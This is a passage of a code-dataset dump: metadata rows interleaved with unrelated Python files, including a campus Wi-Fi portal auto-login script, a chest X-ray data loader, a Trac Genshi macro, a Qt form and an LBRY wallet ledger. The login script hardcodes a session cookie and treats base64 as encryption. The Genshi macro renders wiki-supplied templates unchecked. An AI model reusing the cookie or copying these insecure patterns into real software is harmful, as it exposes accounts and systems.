rob.close() | 32.213333 | 124 | 0.577815 | 416 | 2,416 | 3.240385 | 0.338942 | 0.01632 | 0.067507 | 0.083086 | 0.395401 | 0.333086 | 0.179525 | 0.179525 | 0.152819 | 0.152819 | 0 | 0.207187 | 0.262831 | 2,416 | 75 | 125 | 32.213333 | 0.549691 | 0.243377 | 0 | 0.326087 | 0 | 0 | 0.024834 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.065217 | 0 | 0.065217 | 0.021739 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a13428de836fe2ca966877503cf126c867ad3cd6 | 531 | py | Python | xos/synchronizers/openstack/model_policies/model_policy_Sliver.py | xmaruto/mcord | 3678a3d10c3703c2b73f396c293faebf0c82a4f4 | [
"Apache-2.0"
] | null | null | null | xos/synchronizers/openstack/model_policies/model_policy_Sliver.py | xmaruto/mcord | 3678a3d10c3703c2b73f396c293faebf0c82a4f4 | [
"Apache-2.0"
] | null | null | null | xos/synchronizers/openstack/model_policies/model_policy_Sliver.py | xmaruto/mcord | 3678a3d10c3703c2b73f396c293faebf0c82a4f4 | [
"Apache-2.0"
] | null | null | null |
def handle(instance):
from core.models import Controller, ControllerSlice, ControllerNetwork, NetworkSlice
networks = [ns.network for ns in NetworkSlice.objects.filter(slice=instance.slice)]
controller_networks = ControllerNetwork.objects.filter(network__in=networks,
controller=instance.node.site_deployment.controller)
for cn in controller_networks:
if (cn.lazy_blocked):
cn.lazy_blocked=False
cn.backend_register = '{}'
cn.save()
| 37.928571 | 116 | 0.6742 | 55 | 531 | 6.363636 | 0.545455 | 0.074286 | 0.074286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.242938 | 531 | 13 | 117 | 40.846154 | 0.870647 | 0 | 0 | 0 | 0 | 0 | 0.003774 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.1 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a137958aa6262c5d4af45fea5f852cfe4e0fb7c7 | 5,509 | py | Python | plugin/autoWHUT.py | PPeanutButter/MediaServer | a6a0b3f424ca3fc4ea73d78db380ec3cc882bfd2 | [
"MIT"
] | 2 | 2021-09-23T15:09:25.000Z | 2022-01-16T01:04:07.000Z | plugin/autoWHUT.py | PPeanutButter/MediaServer | a6a0b3f424ca3fc4ea73d78db380ec3cc882bfd2 | [
"MIT"
] | 1 | 2022-02-23T04:00:16.000Z | 2022-02-23T04:10:06.000Z | plugin/autoWHUT.py | PPeanutButter/MediaServer | a6a0b3f424ca3fc4ea73d78db380ec3cc882bfd2 | [
"MIT"
] | 1 | 2021-09-23T15:09:26.000Z | 2021-09-23T15:09:26.000Z | # coding=<utf-8>
import requests
import re
import socket
import base64
import psutil
import pywifi
from pywifi import const
import subprocess
import os
import time
def get_host_ip():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
finally:
s.close()
return ip
def encrypt(password):
password = base64.b64encode(password.encode('utf-8'))
return password.decode('utf-8')
def getNetIfAddr():
    dic = psutil.net_if_addrs()
    mac = ''
    for adapter in dic:
        print(adapter)
        # only the wireless interface is of interest here
        if adapter != 'wls1':
            continue
        snicList = dic[adapter]
        ipv4 = ''
        ipv6 = ''
        for snic in snicList:
            if snic.family.name in {'AF_LINK', 'AF_PACKET'}:
                mac = snic.address
            elif snic.family.name == 'AF_INET':
                ipv4 = snic.address
            elif snic.family.name == 'AF_INET6':
                ipv6 = snic.address
        print('%s, %s, %s, %s' % (adapter, mac, ipv4, ipv6))
    return mac
def get_mac_address():
return getNetIfAddr().lower()
class AutoWHUT:
def get_param(self, username: str, password: str, cookies: str):
header = {
'Origin': 'http://172.30.16.34',
'Referer': 'http://172.30.16.34/srun_portal_pc.php?ac_id=1&cmd=login&switchip=172.30.14.104&mac=84:ef:18'
':91:e5:5b&ip=' + get_host_ip() +
'&essid=WHUT-WLAN6&apname=JB-JH-J4-0901-E&apgroup=WHUT-WLAN-Dual&url=http://www.gstatic.com'
'/generate_204',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362',
'Accept': '*/*',
'Accept-Language': 'zh-CN',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Accept-Encoding': 'gzip, deflate',
'Host': '172.30.16.34',
'Connection': 'Keep-Alive',
'Pragma': 'no-cache',
'Cookie': cookies
}
data = 'action=login&username=&password=&ac_id=64&user_ip=&nas_ip=&user_mac=&save_me=1&ajax=1'
data = re.sub("username=.*?&", "username=" + username + '&', data)
data = re.sub("password=.*?&", "password={B}" + encrypt(password) + '&', data)
data = re.sub("user_ip=.*?&", "user_ip=" + get_host_ip() + '&', data)
data = re.sub("user_mac=.*?&", "user_mac=" + get_mac_address() + '&', data)
return header, data
def sign_in(self):
try:
username = ''
password = ''
cookies = 'login=bQ0pOyR6IXU7PJaQQqRAcBPxGAvxAcrvEe0UJsVvdkTHxMBomR2HUS3oxriFtDiSt7XrDS' \
'%2BmurcIcGKHmgRZbb8fUGzw%2FUGvJFIjk0nAVIEwPGYVt7br7b5u1t4sMp' \
'%2BAfr4VZ5VcKPDr8eaBrOt2YRrH9Bdy6bogpY89dPj' \
'%2BzwrVuc4xmFUoWD8peECGHshewZRrIVvucbx652F2TRxF3VtHNL9H0fs5GjjmJjQMtecd; ' \
'NSC_tsvo_4l_TH=ffffffffaf160e3a45525d5f4f58455e445a4a423660; ' \
'login=bQ0pOyR6IXU7PJaQQqRAcBPxGAvxAcrvEe0UJsVvdkTHxMBomR2HUS3oxriFtDiSt7XrDS' \
'%2BmurcIcGKHmgRZbb8fUGzw%2FUGvJFIjk0nAVIEwPGYVt7br7b5u1t4sMp' \
'%2BAfr4VZ5VcKPDr8eaBrOt2YRrH9Bdy6bogpY89dPj' \
'%2BzwrVuc4xmFUoWD8peECGHshewZRrIVvucbx652F2TRxF3VtHNL9H0fs5GjjmJjQMtecd '
header, data = self.get_param(username, password, cookies)
print(data)
result = requests.post('http://172.30.16.34/include/auth_action.php', headers=header, data=data)
print(result.text, '\n{}\n'.format('*' * 79), result.encoding)
        # Catch Exception rather than BaseException so Ctrl-C still works.
        except Exception as arg:
            print(arg)
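As an aside, the regex-edited template string in `get_param` can be assembled directly with `urllib.parse.urlencode`; a self-contained sketch (field names and order copied from the template above, sample values hypothetical; `safe='{}:'` keeps the `{B}` scheme marker and the MAC's colons literal, as the regex approach does):

```python
from urllib.parse import urlencode


def build_login_body(username, password_b64, user_ip, user_mac):
    # Same fields as the 'action=login&username=...' template string.
    fields = [
        ('action', 'login'),
        ('username', username),
        ('password', '{B}' + password_b64),
        ('ac_id', '64'),
        ('user_ip', user_ip),
        ('nas_ip', ''),
        ('user_mac', user_mac),
        ('save_me', '1'),
        ('ajax', '1'),
    ]
    return urlencode(fields, safe='{}:')


print(build_login_body('alice', 'c2VjcmV0', '10.0.0.2', 'aa:bb:cc:dd:ee:ff'))
```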
class WifiManager:
def __init__(self):
self.wifi = pywifi.PyWiFi()
self.ifaces = self.wifi.interfaces()[1]
self.autoWHUT = AutoWHUT()
self.sleepTime = 1
def is_connected_wifi(self):
return self.ifaces.status() == const.IFACE_CONNECTED
def get_current_wifi(self):
cmd = 'netsh wlan show interfaces'
p = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
ret = p.stdout.read()
ret = ret.decode('gbk')
index = ret.find("SSID")
if index > 0:
return ret[index:].split(':')[1].split('\r\n')[0].strip()
else:
return None
    def check_net(self):
        # Probe a well-known page: the campus portal injects a
        # "?cmd=redirect" marker into the response when not logged in.
        try:
            result = requests.post('http://www.baidu.com')
            return result.text.find("?cmd=redirect") == -1
        except Exception:
            return False
def auto_check(self):
if self.is_connected_wifi():
if not self.check_net():
self.autoWHUT.sign_in()
print("2s")
self.sleepTime = 2
else:
self.sleepTime = 60
print("60s")
else:
self.sleepTime = 4
print("no wifi")
def start(self):
while True:
self.auto_check()
time.sleep(self.sleepTime)
if __name__ == '__main__':
wifiManager = WifiManager()
wifiManager.start()
# === File: covidaid/tools/read_data.py (repo: sabuj7177/CovidProject, license: Apache-2.0) ===
# encoding: utf-8
"""
Read images and corresponding labels.
"""
import torch
from torch.utils.data import Dataset
from PIL import Image
import os
import random
class ChestXrayDataSetTest(Dataset):
def __init__(self, image_list_file, transform=None, combine_pneumonia=False):
"""
Create the Data Loader.
Since class 3 (Covid) has limited covidaid_data, dataset size will be accordingly at train time.
Code is written in generic form to assume last class as the rare class
Args:
image_list_file: path to the file containing images
with corresponding labels.
transform: optional transform to be applied on a sample.
combine_pneumonia: True for combining Baterial and Viral Pneumonias into one class
"""
self.NUM_CLASSES = 3 if combine_pneumonia else 4
# Set of images for each class
image_names = []
with open(image_list_file, "r") as f:
for line in f:
items = line.split()
image_name = items[0]
label = int(items[1])
image_names.append((image_name, label))
self.image_names = image_names
self.transform = transform
def __getitem__(self, index):
"""
Args:
index: the index of item
Returns:
image and its labels
"""
def __one_hot_encode(l):
v = [0] * self.NUM_CLASSES
v[l] = 1
return v
image_name, label = self.image_names[index]
label = __one_hot_encode(label)
image = Image.open(image_name).convert('RGB')
if self.transform is not None:
image = self.transform(image)
return image, torch.FloatTensor(label)
def __len__(self):
return len(self.image_names)
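Both dataset classes one-hot encode labels with a nested `__one_hot_encode` helper before wrapping the result in a `torch.FloatTensor`; the mapping in isolation:

```python
def one_hot_encode(label, num_classes):
    # A list of zeros with a single 1 at the label's index.
    v = [0] * num_classes
    v[label] = 1
    return v


print(one_hot_encode(2, 4))  # [0, 0, 1, 0]
```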
class ChestXrayDataSet(Dataset):
def __init__(self, image_list_file, transform=None, combine_pneumonia=False):
"""
Create the Data Loader.
Since class 3 (Covid) has limited covidaid_data, dataset size will be accordingly at train time.
Code is written in generic form to assume last class as the rare class
Args:
image_list_file: path to the file containing images
with corresponding labels.
transform: optional transform to be applied on a sample.
combine_pneumonia: True for combining Baterial and Viral Pneumonias into one class
"""
self.NUM_CLASSES = 3 if combine_pneumonia else 4
# Set of images for each class
image_names = [[] for _ in range(self.NUM_CLASSES)]
with open(image_list_file, "r") as f:
for line in f:
items = line.split()
image_name = items[0]
label = int(items[1])
image_names[label].append(image_name)
self.image_names = image_names
self.transform = transform
label_dist = [len(cnames) for cnames in image_names]
# Number of images of each class desired
self.num_covid = int(label_dist[-1])
if combine_pneumonia:
covid_factor = 7.0
self.num_normal = int(self.num_covid * covid_factor)
self.num_pneumonia = int(self.num_covid * covid_factor)
self.total = self.num_covid + self.num_pneumonia + self.num_normal
self.loss_weight_minus = torch.FloatTensor([self.num_normal, self.num_pneumonia, self.num_covid]).unsqueeze(0).cuda() / self.total
self.loss_weight_plus = 1.0 - self.loss_weight_minus
else:
covid_factor = 5.0
self.num_normal = int(self.num_covid * covid_factor)
self.num_viral = int(self.num_covid * covid_factor)
self.num_bact = int(self.num_covid * covid_factor)
self.total = self.num_covid + self.num_viral + self.num_bact + self.num_normal
self.loss_weight_minus = torch.FloatTensor([self.num_normal, self.num_bact, self.num_viral, self.num_covid]).unsqueeze(0).cuda() / self.total
self.loss_weight_plus = 1.0 - self.loss_weight_minus
# print (self.loss_weight_plus, self.loss_weight_minus)
if combine_pneumonia:
self.partitions = [self.num_covid,
self.num_covid + self.num_normal,
self.num_covid + self.num_normal + self.num_pneumonia]
else:
self.partitions = [self.num_covid,
self.num_covid + self.num_normal,
self.num_covid + self.num_normal + self.num_bact,
self.num_covid + self.num_normal + self.num_bact + self.num_viral]
assert len(self.partitions) == self.NUM_CLASSES
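The cumulative `partitions` list built above drives the index-to-class mapping used by `__getitem__`: indices below the first boundary map to the rare last class (Covid), and later slots map to classes 0, 1, ... in order. The arithmetic can be checked in isolation (the sizes below are hypothetical, not taken from any real split):

```python
def index_to_class(index, partitions, num_classes):
    # partitions are cumulative sizes, e.g. [n_covid, n_covid + n_normal, ...].
    if index < partitions[0]:
        return num_classes - 1  # the rare (last) class
    for l in range(1, num_classes):
        if index < partitions[l]:
            return l - 1
    raise IndexError(index)


parts = [10, 80, 150]  # hypothetical sizes for the 3-class (combined) setup
print([index_to_class(i, parts, 3) for i in (0, 9, 10, 79, 80, 149)])  # [2, 2, 0, 0, 1, 1]
```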
def __getitem__(self, index):
"""
Args:
index: the index of item
Returns:
image and its labels
"""
def __one_hot_encode(l):
v = [0] * self.NUM_CLASSES
v[l] = 1
return v
image_name = None
# print (index, self.partitions, len(self), sum([len(cnames) for cnames in self.image_names]))
if index < self.partitions[0]:
# Return a covid image
data_idx = index
image_name = self.image_names[self.NUM_CLASSES - 1][data_idx]
label = __one_hot_encode(self.NUM_CLASSES - 1)
else:
# Return non-covid image
for l in range(1, self.NUM_CLASSES):
if index < self.partitions[l]:
class_idx = l - 1
label = __one_hot_encode(class_idx)
# Return a random image
image_name = random.choice(self.image_names[class_idx])
break
assert image_name is not None
image = Image.open(image_name).convert('RGB')
if self.transform is not None:
image = self.transform(image)
return image, torch.FloatTensor(label)
def __len__(self):
return self.partitions[-1]
    def loss(self, output, target):
        """
        Binary weighted cross-entropy loss for each class
        """
        weight_plus = torch.autograd.Variable(self.loss_weight_plus.repeat(1, target.size(0)).view(-1, self.loss_weight_plus.size(1)).cuda())
        weight_neg = torch.autograd.Variable(self.loss_weight_minus.repeat(1, target.size(0)).view(-1, self.loss_weight_minus.size(1)).cuda())
        loss = output
        pmask = (target >= 0.5).data
        nmask = (target < 0.5).data
        epsilon = 1e-15
        loss[pmask] = (loss[pmask] + epsilon).log() * weight_plus[pmask]
        # Negative-mask terms must use the negative-class weight; the original
        # multiplied by weight_plus here and left weight_neg unused.
        loss[nmask] = (1 - loss[nmask] + epsilon).log() * weight_neg[nmask]
        loss = -loss.sum()
        return loss
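Element-wise, the masked computation in `loss` is a weighted binary cross-entropy; a scalar sketch of the intended weighting in pure Python, without torch (note the code defines both a positive-class and a negative-class weight):

```python
import math


def weighted_bce(p, target, w_plus, w_minus, eps=1e-15):
    # Positive targets contribute -w_plus * log(p); negative targets
    # contribute -w_minus * log(1 - p).
    if target >= 0.5:
        return -w_plus * math.log(p + eps)
    return -w_minus * math.log(1.0 - p + eps)


# A confident correct prediction costs far less than a confident miss.
print(weighted_bce(0.9, 1.0, 0.8, 0.2) < weighted_bce(0.1, 1.0, 0.8, 0.2))  # True
```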
# === File: genshimacro/__init__.py (repo: trac-hacks/trac-GenshiMacro, license: BSD-3-Clause) ===
from genshi.template import MarkupTemplate
from trac.core import *
from trac.web.chrome import Chrome
from trac.wiki.macros import WikiMacroBase
class GenshiMacro(WikiMacroBase):
    def expand_macro(self, formatter, name, text, args):
        template = MarkupTemplate(text)
        chrome = Chrome(self.env)
        return template.generate(**chrome.populate_data(formatter.req, {}))
# === File: src/_sever_qt4.py (repo: Joy917/fast-transfer, license: MIT) ===
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'D:\SVNzhangy\fast-transfer\src\_sever.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
# NOTE: the import was changed by hand from PyQt4 to the PySide bindings,
# although the header above still names the PyQt4 generator.
from PySide import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName(_fromUtf8("Form"))
Form.resize(798, 732)
self.gridLayout = QtGui.QGridLayout(Form)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.groupBox_2 = QtGui.QGroupBox(Form)
self.groupBox_2.setObjectName(_fromUtf8("groupBox_2"))
self.verticalLayout_2 = QtGui.QVBoxLayout(self.groupBox_2)
self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
spacerItem = QtGui.QSpacerItem(20, 20, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.checkBox_time = QtGui.QCheckBox(self.groupBox_2)
self.checkBox_time.setObjectName(_fromUtf8("checkBox_time"))
self.horizontalLayout.addWidget(self.checkBox_time)
self.dateTimeEdit_start = QtGui.QDateTimeEdit(self.groupBox_2)
self.dateTimeEdit_start.setDateTime(QtCore.QDateTime(QtCore.QDate(2017, 1, 1), QtCore.QTime(0, 0, 0)))
self.dateTimeEdit_start.setCalendarPopup(True)
self.dateTimeEdit_start.setObjectName(_fromUtf8("dateTimeEdit_start"))
self.horizontalLayout.addWidget(self.dateTimeEdit_start)
self.label_2 = QtGui.QLabel(self.groupBox_2)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.horizontalLayout.addWidget(self.label_2)
self.dateTimeEdit_end = QtGui.QDateTimeEdit(self.groupBox_2)
self.dateTimeEdit_end.setDateTime(QtCore.QDateTime(QtCore.QDate(2018, 1, 1), QtCore.QTime(0, 0, 0)))
self.dateTimeEdit_end.setCalendarPopup(True)
self.dateTimeEdit_end.setObjectName(_fromUtf8("dateTimeEdit_end"))
self.horizontalLayout.addWidget(self.dateTimeEdit_end)
spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem1)
self.verticalLayout_2.addLayout(self.horizontalLayout)
self.horizontalLayout_3 = QtGui.QHBoxLayout()
self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
spacerItem2 = QtGui.QSpacerItem(20, 20, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem2)
self.checkBox_ip = QtGui.QCheckBox(self.groupBox_2)
self.checkBox_ip.setObjectName(_fromUtf8("checkBox_ip"))
self.horizontalLayout_3.addWidget(self.checkBox_ip)
self.lineEdit_ip = QtGui.QLineEdit(self.groupBox_2)
self.lineEdit_ip.setObjectName(_fromUtf8("lineEdit_ip"))
self.horizontalLayout_3.addWidget(self.lineEdit_ip)
spacerItem3 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.MinimumExpanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem3)
self.verticalLayout_2.addLayout(self.horizontalLayout_3)
self.horizontalLayout_4 = QtGui.QHBoxLayout()
self.horizontalLayout_4.setObjectName(_fromUtf8("horizontalLayout_4"))
spacerItem4 = QtGui.QSpacerItem(20, 20, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_4.addItem(spacerItem4)
self.checkBox_fuzzy = QtGui.QCheckBox(self.groupBox_2)
self.checkBox_fuzzy.setObjectName(_fromUtf8("checkBox_fuzzy"))
self.horizontalLayout_4.addWidget(self.checkBox_fuzzy)
self.lineEdit_fuzzysearch = QtGui.QLineEdit(self.groupBox_2)
self.lineEdit_fuzzysearch.setObjectName(_fromUtf8("lineEdit_fuzzysearch"))
self.horizontalLayout_4.addWidget(self.lineEdit_fuzzysearch)
spacerItem5 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_4.addItem(spacerItem5)
self.verticalLayout_2.addLayout(self.horizontalLayout_4)
self.gridLayout.addWidget(self.groupBox_2, 1, 0, 1, 2)
self.groupBox = QtGui.QGroupBox(Form)
self.groupBox.setObjectName(_fromUtf8("groupBox"))
self.verticalLayout = QtGui.QVBoxLayout(self.groupBox)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.textBrowser_log = QtGui.QTextBrowser(self.groupBox)
self.textBrowser_log.viewport().setProperty("cursor", QtGui.QCursor(QtCore.Qt.IBeamCursor))
self.textBrowser_log.setMouseTracking(True)
self.textBrowser_log.setObjectName(_fromUtf8("textBrowser_log"))
self.verticalLayout.addWidget(self.textBrowser_log)
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.lineEdit_pagenumStart = QtGui.QLineEdit(self.groupBox)
self.lineEdit_pagenumStart.setMaximumSize(QtCore.QSize(50, 16777215))
self.lineEdit_pagenumStart.setObjectName(_fromUtf8("lineEdit_pagenumStart"))
self.horizontalLayout_2.addWidget(self.lineEdit_pagenumStart)
self.label_3 = QtGui.QLabel(self.groupBox)
self.label_3.setMaximumSize(QtCore.QSize(20, 16777215))
self.label_3.setObjectName(_fromUtf8("label_3"))
self.horizontalLayout_2.addWidget(self.label_3)
self.lineEdit_pagenumEnd = QtGui.QLineEdit(self.groupBox)
self.lineEdit_pagenumEnd.setMaximumSize(QtCore.QSize(50, 16777215))
self.lineEdit_pagenumEnd.setObjectName(_fromUtf8("lineEdit_pagenumEnd"))
self.horizontalLayout_2.addWidget(self.lineEdit_pagenumEnd)
spacerItem6 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem6)
self.pushButton_pageup = QtGui.QPushButton(self.groupBox)
self.pushButton_pageup.setObjectName(_fromUtf8("pushButton_pageup"))
self.horizontalLayout_2.addWidget(self.pushButton_pageup)
self.pushButton_pagedown = QtGui.QPushButton(self.groupBox)
self.pushButton_pagedown.setObjectName(_fromUtf8("pushButton_pagedown"))
self.horizontalLayout_2.addWidget(self.pushButton_pagedown)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.gridLayout.addWidget(self.groupBox, 0, 0, 1, 2)
self.horizontalLayout_5 = QtGui.QHBoxLayout()
self.horizontalLayout_5.setObjectName(_fromUtf8("horizontalLayout_5"))
self.label_notice = QtGui.QLabel(Form)
self.label_notice.setMinimumSize(QtCore.QSize(600, 0))
self.label_notice.setObjectName(_fromUtf8("label_notice"))
self.horizontalLayout_5.addWidget(self.label_notice)
spacerItem7 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_5.addItem(spacerItem7)
self.pushButton_check = QtGui.QPushButton(Form)
self.pushButton_check.setObjectName(_fromUtf8("pushButton_check"))
self.horizontalLayout_5.addWidget(self.pushButton_check)
self.gridLayout.addLayout(self.horizontalLayout_5, 2, 0, 1, 2)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(_translate("Form", "LogManager", None))
self.groupBox_2.setTitle(_translate("Form", "Search Setting", None))
self.checkBox_time.setText(_translate("Form", "time:", None))
self.label_2.setText(_translate("Form", "-----", None))
self.checkBox_ip.setText(_translate("Form", "IP: ", None))
self.checkBox_fuzzy.setText(_translate("Form", "fuzzy:", None))
self.groupBox.setTitle(_translate("Form", "Log Display", None))
self.label_3.setText(_translate("Form", "---", None))
self.pushButton_pageup.setText(_translate("Form", "page up ", None))
self.pushButton_pagedown.setText(_translate("Form", "page down", None))
self.label_notice.setText(_translate("Form", "Notice:", None))
self.pushButton_check.setText(_translate("Form", "Check", None))
# === File: share/pegasus/init/split/daxgen.py (repo: fengggli/pegasus, license: Apache-2.0) ===
#!/usr/bin/env python
import os
import pwd
import sys
import time
from Pegasus.DAX3 import *
# The name of the DAX file is the first argument
if len(sys.argv) != 2:
    sys.stderr.write("Usage: %s DAXFILE\n" % (sys.argv[0]))
    sys.exit(1)
daxfile = sys.argv[1]
USER = pwd.getpwuid(os.getuid())[0]
# Create an abstract DAG
dax = ADAG("split")
# Add some workflow-level metadata
dax.metadata("creator", "%s@%s" % (USER, os.uname()[1]))
dax.metadata("created", time.ctime())
webpage = File("pegasus.html")
# the split job that splits the webpage into smaller chunks
split = Job("split")
split.addArguments("-l","100","-a","1",webpage,"part.")
split.uses(webpage, link=Link.INPUT)
# associate the label with the job. all jobs with same label
# are run with PMC when doing job clustering
split.addProfile( Profile("pegasus","label","p1"))
dax.addJob(split)
# we do a parameter sweep on the first 4 chunks created
for c in "abcd":
    part = File("part.%s" % c)
    split.uses(part, link=Link.OUTPUT, transfer=False, register=False)

    count = File("count.txt.%s" % c)
    wc = Job("wc")
    wc.addProfile(Profile("pegasus", "label", "p1"))
    wc.addArguments("-l", part)
    wc.setStdout(count)
    wc.uses(part, link=Link.INPUT)
    wc.uses(count, link=Link.OUTPUT, transfer=True, register=True)
    dax.addJob(wc)

    # adding dependency
    dax.depends(wc, split)
f = open(daxfile, "w")
dax.writeXML(f)
f.close()
print "Generated dax %s" %daxfile
# === File: lbrynet/wallet/ledger.py (repo: ttkopec/lbry, license: MIT) ===
import logging
from six import int2byte
from binascii import unhexlify
from twisted.internet import defer
from .resolve import Resolver
from lbryschema.error import URIParseError
from lbryschema.uri import parse_lbry_uri
from torba.baseledger import BaseLedger
from .account import Account
from .network import Network
from .database import WalletDatabase
from .transaction import Transaction
from .header import Headers, UnvalidatedHeaders
log = logging.getLogger(__name__)
class MainNetLedger(BaseLedger):
name = 'LBRY Credits'
symbol = 'LBC'
network_name = 'mainnet'
account_class = Account
database_class = WalletDatabase
headers_class = Headers
network_class = Network
transaction_class = Transaction
secret_prefix = int2byte(0x1c)
pubkey_address_prefix = int2byte(0x55)
script_address_prefix = int2byte(0x7a)
extended_public_key_prefix = unhexlify('0488b21e')
extended_private_key_prefix = unhexlify('0488ade4')
max_target = 0x0000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
genesis_hash = '9c89283ba0f3227f6c03b70216b9f665f0118d5e0fa729cedf4fb34d6a34f463'
genesis_bits = 0x1f00ffff
target_timespan = 150
default_fee_per_byte = 50
default_fee_per_name_char = 200000
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fee_per_name_char = self.config.get('fee_per_name_char', self.default_fee_per_name_char)
@property
def resolver(self):
return Resolver(self.headers.claim_trie_root, self.headers.height, self.transaction_class,
hash160_to_address=self.hash160_to_address, network=self.network)
    @defer.inlineCallbacks
    def resolve(self, page, page_size, *uris):
        for uri in uris:
            try:
                parse_lbry_uri(uri)
            except URIParseError as err:
                # Python 3 exceptions have no .message attribute; use str().
                defer.returnValue({'error': str(err)})
        resolutions = yield self.network.get_values_for_uris(self.headers.hash().decode(), *uris)
        return (yield self.resolver._handle_resolutions(resolutions, uris, page, page_size))
@defer.inlineCallbacks
def get_claim_by_claim_id(self, claim_id):
result = (yield self.network.get_claims_by_ids(claim_id)).pop(claim_id, {})
return (yield self.resolver.get_certificate_and_validate_result(result))
    @defer.inlineCallbacks
    def get_claim_by_outpoint(self, txid, nout):
        claims = (yield self.network.get_claims_in_tx(txid)) or []
        for claim in claims:
            if claim['nout'] == nout:
                return (yield self.resolver.get_certificate_and_validate_result(claim))
        return 'claim not found'
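The linear scan in `get_claim_by_outpoint` reduces to a first-match filter over the claim dicts returned by the network; a minimal sketch with hypothetical claim records:

```python
def claim_for_nout(claims, nout):
    # First claim whose 'nout' matches, else the same not-found marker
    # the method above returns.
    for claim in claims:
        if claim['nout'] == nout:
            return claim
    return 'claim not found'


claims = [{'nout': 0, 'name': 'a'}, {'nout': 2, 'name': 'b'}]  # hypothetical records
print(claim_for_nout(claims, 2)['name'])  # b
print(claim_for_nout(claims, 5))          # claim not found
```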
@defer.inlineCallbacks
def start(self):
yield super().start()
yield defer.DeferredList([
a.maybe_migrate_certificates() for a in self.accounts
])
class TestNetLedger(MainNetLedger):
network_name = 'testnet'
pubkey_address_prefix = int2byte(111)
script_address_prefix = int2byte(196)
extended_public_key_prefix = unhexlify('043587cf')
extended_private_key_prefix = unhexlify('04358394')
class RegTestLedger(MainNetLedger):
network_name = 'regtest'
headers_class = UnvalidatedHeaders
pubkey_address_prefix = int2byte(111)
script_address_prefix = int2byte(196)
extended_public_key_prefix = unhexlify('043587cf')
extended_private_key_prefix = unhexlify('04358394')
max_target = 0x7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
genesis_hash = '6e3fcf1299d4ec5d79c3a4c91d624a4acf9e2e173d95a1a0504f677669687556'
genesis_bits = 0x207fffff
target_timespan = 1
# === File: pyHarvest_build_151223/pyHarvest_Analyse_Data_v1.py (repo: bl305/pyHarvest, license: CC0-1.0) ===
# coding=utf-8
from packages import *
import os
#SET PARAMETERS
myverbosity=-1
mymaxencode=5
TXT_filetypes=(
#simple text files
'txt','lst',
#config files
'ini','cfg',
#programming languages
'c','cpp',
#scripts
'vbs','py','pl')
XLS_filetypes=('xls','xlsx')
DOC_filetypes=('doc',)
DOCX_filetypes=('docx',)
PDF_filetypes=('pdf',)
#TEMPLATE FILES
myXLSpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\XLS\test.xlsx'
